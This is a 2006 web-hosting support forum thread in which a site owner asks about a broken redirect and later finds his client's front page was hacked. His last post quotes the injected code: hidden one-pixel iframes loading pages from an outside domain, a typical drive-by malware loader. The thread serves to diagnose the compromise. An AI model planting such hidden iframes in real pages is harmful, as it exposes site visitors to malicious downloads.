catalyst2 community forums  

Go Back   catalyst2 community forums > Support > Other Support Queries

Reply
 
LinkBack Thread Tools Rate Thread Display Modes
Old 23-08-2006, 07:54 PM   #1 (permalink)
Registered User
 
Join Date: Jun 2003
Posts: 29
Strange page forwarding behaviour

Hi all,

The front page to one of my clients' websites is behaving strangely.

The page in question is http://www.kanishkabags.co.uk/ and the behaviour is that it is not fowarding to the shop homepage, which is http://www.kanishkabags.co.uk/shop/agora.cgi, but rather getting stuck in a loop.

It worked fine before, using meta refresh as follows:
<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://www.kanishkabags.co.uk/shop/agora.cgi">

The strange behaviour is shown in the status bar of my browser, which displays messages such as "Read hostingprod.com" in between saying "Waiting for kanishkabags.co.uk" or "Transferring data from kanishkabags.co.uk"

Also, according to firefox page info, I have the following media on the page:
http://geo.yahoo.com/serv?s=76001524...358602&f=p9w18
http://geo.yahoo.com/serv?s=76001524...362629&f=p9w15

What on earth is all this about? Do I have spyware on my computer, is the site hacked, or what? The source code, as you can see for yourself, is about 15 lines long and contains none of these references.

Any help would be greatly appreciated
__________________
Everyone Makes Mistakes
I Create Disasters
Oliy is offline   Reply With Quote
Old 23-08-2006, 08:34 PM   #2 (permalink)
Administrator
 
Jacob's Avatar
 
Join Date: May 2003
Posts: 1,299
There appears to be some encoded javascript on the page - I would try creating the page with just the meta refresh and nothing else and see if that works.

Regards,

Jacob
Jacob is offline   Reply With Quote
Old 23-08-2006, 09:12 PM   #3 (permalink)
Registered User
 
Join Date: Jun 2003
Posts: 29
Hi Jacob,
Thanks for your reply. Commenting out the javascript works, but it doesn't explain where this reference to prodhosting.com comes from, or those mysterious links to geo.yahoo.com (which is still there, according to my browser at least...)
__________________
Everyone Makes Mistakes
I Create Disasters
Oliy is offline   Reply With Quote
Old 15-09-2006, 10:05 PM   #4 (permalink)
Registered User
 
Join Date: Jun 2003
Posts: 29
This code appeared on the front page:

Code:
<body>

<iframe src="http://fl4w.info/ie.php" width="1" height="1" hspace="1" vspace="1"></iframe>

</body>

</html><html>

<body>

<iframe src="http://fl4w.info/ie.php" width="1" height="1" hspace="1" vspace="1"></iframe>

</body>

</html><html>

<body>

<iframe src="http://fl4w.info/maik/index.php" width="1" height="1" hspace="1" vspace="1"></iframe>

</body>

</html><html>

<body>

<iframe src="http://fl4w.info/maik/index.php" width="1" height="1" hspace="1" vspace="1"></iframe>

</body>
The site was definitely hacked. Is there any way you can test the site for vulnerabilities or prevent this happening again? There are no upload scripts apart from the standard agora upload script for images on the website.

Thanks,
Oliy
__________________
Everyone Makes Mistakes
I Create Disasters
Oliy is offline   Reply With Quote
Reply

Thread Tools
Display Modes Rate This Thread
Rate This Thread:

Posting Rules
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts

BB code is On
Smilies are On
[IMG] code is Off
HTML code is Off
Trackbacks are On
Pingbacks are On
Refbacks are On


All times are GMT. The time now is 07:01 PM.


Powered by vBulletin® Version 3.7.3
Copyright ©2000 - 2008, Jelsoft Enterprises Ltd.